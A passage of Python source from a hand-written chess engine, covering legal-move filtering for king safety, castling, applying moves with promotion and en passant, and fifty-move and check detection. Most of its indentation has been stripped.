for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] + j and black_occ_y[k] == white_king[0][1] + j:
remove = False
else:
for j in range(1, abs(black_queens[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] + j and white_occ_y[k] == white_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] + j and black_occ_y[k] == white_king[0][1] - j:
remove = False
else:
if black_queens[i][1] > white_king[0][1]:
for j in range(1, abs(black_queens[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] - j and white_occ_y[k] == white_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] - j and black_occ_y[k] == white_king[0][1] + j:
remove = False
else:
for j in range(1, abs(black_queens[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] - j and white_occ_y[k] == white_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] - j and black_occ_y[k] == white_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
remove = True
if black_queens[i][2] == True:
if black_queens[i][0] == white_king[0][0]:
if black_queens[i][1] > white_king[0][1]:
for j in range(1, abs(black_queens[i][1] - white_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] and white_occ_y[k] == white_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] and black_occ_y[k] == white_king[0][1] + j:
remove = False
else:
for j in range(1, abs(black_queens[i][1] - white_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] and white_occ_y[k] == white_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] and black_occ_y[k] == white_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
elif black_queens[i][1] == white_king[0][1]:
if black_queens[i][0] > white_king[0][0]:
for j in range(1, abs(black_queens[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] + j and white_occ_y[k] == white_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] + j and black_occ_y[k] == white_king[0][1]:
remove = False
else:
for j in range(1, abs(black_queens[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] - j and white_occ_y[k] == white_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] - j and black_occ_y[k] == white_king[0][1]:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
if abs(black_king[0][0] - white_king[0][0]) <= 1 and abs(black_king[0][1] - white_king[0][1]) <= 1:
if move in self.legal_moves:
self.legal_moves.remove(move)
else:
for i in range(0, 8):
if black_king[0][0] + 1 == white_pawns[i][0] and black_king[0][1] - 1 == white_pawns[i][1] and white_pawns[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] - 1 == white_pawns[i][0] and black_king[0][1] - 1 == white_pawns[i][1] and white_pawns[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 10):
if black_king[0][0] + 1 == white_knights[i][0] and black_king[0][1] + 2 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] + 2 == white_knights[i][0] and black_king[0][1] + 1 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] + 2 == white_knights[i][0] and black_king[0][1] - 1 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] + 1 == white_knights[i][0] and black_king[0][1] - 2 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] - 1 == white_knights[i][0] and black_king[0][1] - 2 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] - 2 == white_knights[i][0] and black_king[0][1] - 1 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] - 2 == white_knights[i][0] and black_king[0][1] + 1 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] - 1 == white_knights[i][0] and black_king[0][1] + 2 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 10):
remove = True
if white_bishops[i][2] == True and abs(white_bishops[i][0] - black_king[0][0]) == abs(white_bishops[i][1] - black_king[0][1]):
if white_bishops[i][0] > black_king[0][0]:
if white_bishops[i][1] > black_king[0][1]:
for j in range(1, abs(white_bishops[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] + j and white_occ_y[k] == black_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] + j and black_occ_y[k] == black_king[0][1] + j:
remove = False
else:
for j in range(1, abs(white_bishops[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] + j and white_occ_y[k] == black_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] + j and black_occ_y[k] == black_king[0][1] - j:
remove = False
else:
if white_bishops[i][1] > black_king[0][1]:
for j in range(1, abs(white_bishops[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] - j and white_occ_y[k] == black_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] - j and black_occ_y[k] == black_king[0][1] + j:
remove = False
else:
for j in range(1, abs(white_bishops[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] - j and white_occ_y[k] == black_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] - j and black_occ_y[k] == black_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 10):
remove = True
if white_rooks[i][2] == True:
if white_rooks[i][0] == black_king[0][0]:
if white_rooks[i][1] > black_king[0][1]:
for j in range(1, abs(white_rooks[i][1] - black_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] and white_occ_y[k] == black_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] and black_occ_y[k] == black_king[0][1] + j:
remove = False
else:
for j in range(1, abs(white_rooks[i][1] - black_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] and white_occ_y[k] == black_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] and black_occ_y[k] == black_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
elif white_rooks[i][1] == black_king[0][1]:
if white_rooks[i][0] > black_king[0][0]:
for j in range(1, abs(white_rooks[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] + j and white_occ_y[k] == black_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] + j and black_occ_y[k] == black_king[0][1]:
remove = False
else:
for j in range(1, abs(white_rooks[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] - j and white_occ_y[k] == black_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] - j and black_occ_y[k] == black_king[0][1]:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 9):
remove = True
if white_queens[i][2] == True and abs(white_queens[i][0] - black_king[0][0]) == abs(white_queens[i][1] - black_king[0][1]):
if white_queens[i][0] > black_king[0][0]:
if white_queens[i][1] > black_king[0][1]:
for j in range(1, abs(white_queens[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] + j and white_occ_y[k] == black_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] + j and black_occ_y[k] == black_king[0][1] + j:
remove = False
else:
for j in range(1, abs(white_queens[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] + j and white_occ_y[k] == black_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] + j and black_occ_y[k] == black_king[0][1] - j:
remove = False
else:
if white_queens[i][1] > black_king[0][1]:
for j in range(1, abs(white_queens[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] - j and white_occ_y[k] == black_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] - j and black_occ_y[k] == black_king[0][1] + j:
remove = False
else:
for j in range(1, abs(white_queens[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] - j and white_occ_y[k] == black_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] - j and black_occ_y[k] == black_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
remove = True
if white_queens[i][2] == True:
if white_queens[i][0] == black_king[0][0]:
if white_queens[i][1] > black_king[0][1]:
for j in range(1, abs(white_queens[i][1] - black_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] and white_occ_y[k] == black_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] and black_occ_y[k] == black_king[0][1] + j:
remove = False
else:
for j in range(1, abs(white_queens[i][1] - black_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] and white_occ_y[k] == black_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] and black_occ_y[k] == black_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
elif white_queens[i][1] == black_king[0][1]:
if white_queens[i][0] > black_king[0][0]:
for j in range(1, abs(white_queens[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] + j and white_occ_y[k] == black_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] + j and black_occ_y[k] == black_king[0][1]:
remove = False
else:
for j in range(1, abs(white_queens[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] - j and white_occ_y[k] == black_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] - j and black_occ_y[k] == black_king[0][1]:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
if abs(white_king[0][0] - black_king[0][0]) <= 1 and abs(white_king[0][1] - black_king[0][1]) <= 1:
if move in self.legal_moves:
self.legal_moves.remove(move)
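                # If a castling probe (the king stepping across the crossed square) turned out to be illegal,
                # drop the corresponding castle move as well.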
if white_short_castle_through_check_check == True:
white_short_castle_through_check_check = False
if move not in self.legal_moves:
if "O-O" in self.legal_moves:
self.legal_moves.remove("O-O")
elif white_long_castle_through_check_check == True:
white_long_castle_through_check_check = False
if move not in self.legal_moves:
if "O-O-O" in self.legal_moves:
self.legal_moves.remove("O-O-O")
elif black_short_castle_through_check_check == True:
black_short_castle_through_check_check = False
if move not in self.legal_moves:
if "O-O" in self.legal_moves:
self.legal_moves.remove("O-O")
elif black_long_castle_through_check_check == True:
black_long_castle_through_check_check = False
if move not in self.legal_moves:
if "O-O-O" in self.legal_moves:
self.legal_moves.remove("O-O-O")
#print(self.legal_moves)
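        # Strip '+' and 'x' from a move string and report whether it was a capture.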
def convert_to_easy_notation(self, notation_val):
take = False
if notation_val[-1] == "+":
notation_val = notation_val.replace("+", "")
for character in notation_val:
if character == "x":
take = True
notation_val = notation_val.replace("x", "")
return notation_val, take
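        # Apply a confirmed move to the real piece lists: update positions, castling rights, the en passant
        # square and the half-move clock.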
def move_piece(self, notation_val, take):
self.en_passant_x_y = [8, 8]
self.half_moves += 1
if startup.white_turn == False:
self.turn_num += 1
if notation_val[0] == "B":
from_x = notation.get_column_char(notation_val[1])
from_y = int(notation_val[2]) - 1
to_x = notation.get_column_char(notation_val[3])
to_y = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True and self.white_bishops_inf[i][0] == from_x and self.white_bishops_inf[i][1] == from_y:
self.white_bishops_inf[i][0] = to_x
self.white_bishops_inf[i][1] = to_y
else:
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True and self.black_bishops_inf[i][0] == from_x and self.black_bishops_inf[i][1] == from_y:
self.black_bishops_inf[i][0] = to_x
self.black_bishops_inf[i][1] = to_y
elif notation_val[0] == "N":
from_x = notation.get_column_char(notation_val[1])
from_y = int(notation_val[2]) - 1
to_x = notation.get_column_char(notation_val[3])
to_y = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 10):
if self.white_knights_inf[i][2] == True and self.white_knights_inf[i][0] == from_x and self.white_knights_inf[i][1] == from_y:
self.white_knights_inf[i][0] = to_x
self.white_knights_inf[i][1] = to_y
else:
for i in range(0, 10):
if self.black_knights_inf[i][2] == True and self.black_knights_inf[i][0] == from_x and self.black_knights_inf[i][1] == from_y:
self.black_knights_inf[i][0] = to_x
self.black_knights_inf[i][1] = to_y
elif notation_val[0] == "R":
from_x = notation.get_column_char(notation_val[1])
from_y = int(notation_val[2]) - 1
to_x = notation.get_column_char(notation_val[3])
to_y = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True and self.white_rooks_inf[i][0] == from_x and self.white_rooks_inf[i][1] == from_y:
self.white_rooks_inf[i][0] = to_x
self.white_rooks_inf[i][1] = to_y
self.white_rooks_inf[i][3] = False
else:
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True and self.black_rooks_inf[i][0] == from_x and self.black_rooks_inf[i][1] == from_y:
self.black_rooks_inf[i][0] = to_x
self.black_rooks_inf[i][1] = to_y
self.black_rooks_inf[i][3] = False
elif notation_val[0] == "Q":
from_x = notation.get_column_char(notation_val[1])
from_y = int(notation_val[2]) - 1
to_x = notation.get_column_char(notation_val[3])
to_y = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 9):
if self.white_queens_inf[i][2] == True and self.white_queens_inf[i][0] == from_x and self.white_queens_inf[i][1] == from_y:
self.white_queens_inf[i][0] = to_x
self.white_queens_inf[i][1] = to_y
else:
for i in range(0, 9):
if self.black_queens_inf[i][2] == True and self.black_queens_inf[i][0] == from_x and self.black_queens_inf[i][1] == from_y:
self.black_queens_inf[i][0] = to_x
self.black_queens_inf[i][1] = to_y
elif notation_val[0] == "K":
from_x = notation.get_column_char(notation_val[1])
from_y = int(notation_val[2]) - 1
to_x = notation.get_column_char(notation_val[3])
to_y = int(notation_val[4]) - 1
if startup.white_turn == True:
if self.white_king_inf[0][2] == True and self.white_king_inf[0][0] == from_x and self.white_king_inf[0][1] == from_y:
self.white_king_inf[0][0] = to_x
self.white_king_inf[0][1] = to_y
self.white_king_inf[0][3] = False
else:
if self.black_king_inf[0][2] == True and self.black_king_inf[0][0] == from_x and self.black_king_inf[0][1] == from_y:
self.black_king_inf[0][0] = to_x
self.black_king_inf[0][1] = to_y
self.black_king_inf[0][3] = False
elif notation_val[0] == "O":
if startup.white_turn == True:
self.white_king_inf[0][3] = False
if notation_val == "O-O":
self.white_rooks_inf[1][3] = False
self.white_king_inf[0][0] = 6
self.white_king_inf[0][1] = 0
for i in range(0, 2):
if self.white_rooks_inf[i][0] == 7:
self.white_rooks_inf[i][0] = 5
self.white_rooks_inf[i][1] = 0
elif notation_val == "O-O-O":
self.white_rooks_inf[0][3] = False
self.white_king_inf[0][0] = 2
self.white_king_inf[0][1] = 0
for i in range(0, 2):
if self.white_rooks_inf[i][0] == 0:
self.white_rooks_inf[i][0] = 3
self.white_rooks_inf[i][1] = 0
else:
self.black_king_inf[0][3] = False
if notation_val == "O-O":
self.black_rooks_inf[1][3] = False
self.black_king_inf[0][0] = 6
self.black_king_inf[0][1] = 7
for i in range(0, 2):
if self.black_rooks_inf[i][0] == 7:
self.black_rooks_inf[i][0] = 5
self.black_rooks_inf[i][1] = 7
elif notation_val == "O-O-O":
self.black_rooks_inf[0][3] = False
self.black_king_inf[0][0] = 2
self.black_king_inf[0][1] = 7
for i in range(0, 2):
if self.black_rooks_inf[i][0] == 0:
self.black_rooks_inf[i][0] = 3
self.black_rooks_inf[i][1] = 7
else:
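                # Pawn move: a pawn advance or capture resets the half-move clock; resolve the destination
                # (and promotion piece) from the tail of the notation.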
self.half_moves = 0
if notation_val[-2] == "=":
to_x = notation.get_column_char(notation_val[-4])
to_y = int(notation_val[-3]) - 1
else:
to_x = notation.get_column_char(notation_val[-2])
to_y = int(notation_val[-1]) - 1
if take == True:
if notation_val[-2] == "=":
from_x = notation.get_column_char(notation_val[-5])
else:
from_x = notation.get_column_char(notation_val[-3])
if startup.white_turn == True:
from_y = to_y - 1
else:
from_y = to_y + 1
else:
from_x = to_x
if startup.white_turn == True:
if to_y == 3:
from_y = to_y - 2
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True and self.white_pawns_inf[i][0] == from_x and self.white_pawns_inf[i][1] == to_y - 1:
from_y = to_y - 1
else:
from_y = to_y - 1
else:
if to_y == 4:
from_y = to_y + 2
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True and self.black_pawns_inf[i][0] == from_x and self.black_pawns_inf[i][1] == to_y + 1:
from_y = to_y + 1
else:
from_y = to_y + 1
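                # Move the matching pawn: promote on the back rank, otherwise advance it and record the
                # en passant square after a double step.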
if startup.white_turn == True:
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True and self.white_pawns_inf[i][0] == from_x and self.white_pawns_inf[i][1] == from_y:
if to_y == 7:
self.white_pawns_inf[i][2] = False
if notation_val[-1] == "Q":
promotion_complete = False
for i in range(1, 9):
if self.white_queens_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.white_queens_inf[i][0] = to_x
self.white_queens_inf[i][1] = to_y
self.white_queens_inf[i][2] = True
elif notation_val[-1] == "R":
promotion_complete = False
for i in range(2, 10):
if self.white_rooks_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.white_rooks_inf[i][0] = to_x
self.white_rooks_inf[i][1] = to_y
self.white_rooks_inf[i][2] = True
self.white_rooks_inf[i][3] = False
elif notation_val[-1] == "B":
promotion_complete = False
for i in range(2, 10):
if self.white_bishops_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.white_bishops_inf[i][0] = to_x
self.white_bishops_inf[i][1] = to_y
self.white_bishops_inf[i][2] = True
elif notation_val[-1] == "N":
promotion_complete = False
for i in range(2, 10):
if self.white_knights_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.white_knights_inf[i][0] = to_x
self.white_knights_inf[i][1] = to_y
self.white_knights_inf[i][2] = True
else:
self.white_pawns_inf[i][0] = to_x
self.white_pawns_inf[i][1] = to_y
self.white_pawns_inf[i][3] = False
if to_y - from_y == 2:
self.en_passant_x_y = [to_x, to_y]
else:
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True and self.black_pawns_inf[i][0] == from_x and self.black_pawns_inf[i][1] == from_y:
if to_y == 0:
self.black_pawns_inf[i][2] = False
if notation_val[-1] == "Q":
promotion_complete = False
for i in range(1, 9):
if self.black_queens_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.black_queens_inf[i][0] = to_x
self.black_queens_inf[i][1] = to_y
self.black_queens_inf[i][2] = True
elif notation_val[-1] == "R":
promotion_complete = False
for i in range(2, 10):
if self.black_rooks_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.black_rooks_inf[i][0] = to_x
self.black_rooks_inf[i][1] = to_y
self.black_rooks_inf[i][2] = True
self.black_rooks_inf[i][3] = False
elif notation_val[-1] == "B":
promotion_complete = False
for i in range(2, 10):
if self.black_bishops_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.black_bishops_inf[i][0] = to_x
self.black_bishops_inf[i][1] = to_y
self.black_bishops_inf[i][2] = True
elif notation_val[-1] == "N":
promotion_complete = False
for i in range(2, 10):
if self.black_knights_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.black_knights_inf[i][0] = to_x
self.black_knights_inf[i][1] = to_y
self.black_knights_inf[i][2] = True
else:
self.black_pawns_inf[i][0] = to_x
self.black_pawns_inf[i][1] = to_y
self.black_pawns_inf[i][3] = False
if from_y - to_y == 2:
self.en_passant_x_y = [to_x, to_y]
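                # A capture also resets the half-move clock; remove the captured piece, falling back to the
                # en passant pawn if the target square is empty.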
if take == True:
self.half_moves = 0
                    piece_taken = False
if startup.white_turn == True:
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True and self.black_pawns_inf[i][0] == to_x and self.black_pawns_inf[i][1] == to_y:
self.black_pawns_inf[i][2] = False
                                piece_taken = True
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True and self.black_bishops_inf[i][0] == to_x and self.black_bishops_inf[i][1] == to_y:
self.black_bishops_inf[i][2] = False
                                piece_taken = True
for i in range(0, 10):
if self.black_knights_inf[i][2] == True and self.black_knights_inf[i][0] == to_x and self.black_knights_inf[i][1] == to_y:
self.black_knights_inf[i][2] = False
                                piece_taken = True
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True and self.black_rooks_inf[i][0] == to_x and self.black_rooks_inf[i][1] == to_y:
self.black_rooks_inf[i][2] = False
                                piece_taken = True
for i in range(0, 9):
if self.black_queens_inf[i][2] == True and self.black_queens_inf[i][0] == to_x and self.black_queens_inf[i][1] == to_y:
self.black_queens_inf[i][2] = False
                                piece_taken = True
                        if piece_taken == False:
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True and self.black_pawns_inf[i][0] == to_x and self.black_pawns_inf[i][1] == to_y - 1:
self.black_pawns_inf[i][2] = False
else:
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True and self.white_pawns_inf[i][0] == to_x and self.white_pawns_inf[i][1] == to_y:
self.white_pawns_inf[i][2] = False
                                piece_taken = True
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True and self.white_bishops_inf[i][0] == to_x and self.white_bishops_inf[i][1] == to_y:
self.white_bishops_inf[i][2] = False
                                piece_taken = True
for i in range(0, 10):
if self.white_knights_inf[i][2] == True and self.white_knights_inf[i][0] == to_x and self.white_knights_inf[i][1] == to_y:
self.white_knights_inf[i][2] = False
                                piece_taken = True
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True and self.white_rooks_inf[i][0] == to_x and self.white_rooks_inf[i][1] == to_y:
self.white_rooks_inf[i][2] = False
                                piece_taken = True
for i in range(0, 9):
if self.white_queens_inf[i][2] == True and self.white_queens_inf[i][0] == to_x and self.white_queens_inf[i][1] == to_y:
self.white_queens_inf[i][2] = False
                                piece_taken = True
                        if piece_taken == False:
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True and self.white_pawns_inf[i][0] == to_x and self.white_pawns_inf[i][1] == to_y + 1:
self.white_pawns_inf[i][2] = False
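        # Fifty-move rule: half_moves is reset by pawn moves and captures, so 100 half-moves here signals the
        # draw condition; the current check status is reported alongside it.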
def half_move_check(self):
half_move_limit = False
checkmate = False
if self.half_moves >= 100:
half_move_limit = True
checkmate = self.stale_check_mate()
return half_move_limit, checkmate
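        # Return True when the king of the side to move is currently attacked (checkmate rather than stalemate
        # when no legal move remains).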
def stale_check_mate(self):
checkmate = False
if startup.white_turn == True:
for i in range(0, 8):
if checkmate == False and self.white_king_inf[0][0] + 1 == self.black_pawns_inf[i][0] and self.white_king_inf[0][1] + 1 == self.black_pawns_inf[i][1] and self.black_pawns_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] - 1 == self.black_pawns_inf[i][0] and self.white_king_inf[0][1] + 1 == self.black_pawns_inf[i][1] and self.black_pawns_inf[i][2] == True:
checkmate = True
for i in range(0, 10):
if checkmate == False and self.white_king_inf[0][0] + 1 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] + 2 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] + 2 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] + 1 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] + 2 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] - 1 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] + 1 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] - 2 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] - 1 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] - 2 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] - 2 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] - 1 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] - 2 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] + 1 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] - 1 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] + 2 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
for i in range(0, 10):
remove = True
if checkmate == False and self.black_bishops_inf[i][2] == True and abs(self.black_bishops_inf[i][0] - self.white_king_inf[0][0]) == abs(self.black_bishops_inf[i][1] - self.white_king_inf[0][1]):
if self.black_bishops_inf[i][0] > self.white_king_inf[0][0]:
if self.black_bishops_inf[i][1] > self.white_king_inf[0][1]:
for j in range(1, abs(self.black_bishops_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] + j and self.white_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] + j and self.black_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.black_bishops_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] + j and self.white_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] + j and self.black_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
else:
if self.black_bishops_inf[i][1] > self.white_king_inf[0][1]:
for j in range(1, abs(self.black_bishops_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] - j and self.white_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] - j and self.black_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.black_bishops_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] - j and self.white_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] - j and self.black_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
for i in range(0, 10):
remove = True
if checkmate == False and self.black_rooks_inf[i][2] == True:
if self.black_rooks_inf[i][0] == self.white_king_inf[0][0]:
if self.black_rooks_inf[i][1] > self.white_king_inf[0][1]:
for j in range(1, abs(self.black_rooks_inf[i][1] - self.white_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] and self.white_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] and self.black_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.black_rooks_inf[i][1] - self.white_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] and self.white_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] and self.black_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
elif self.black_rooks_inf[i][1] == self.white_king_inf[0][1]:
if self.black_rooks_inf[i][0] > self.white_king_inf[0][0]:
for j in range(1, abs(self.black_rooks_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
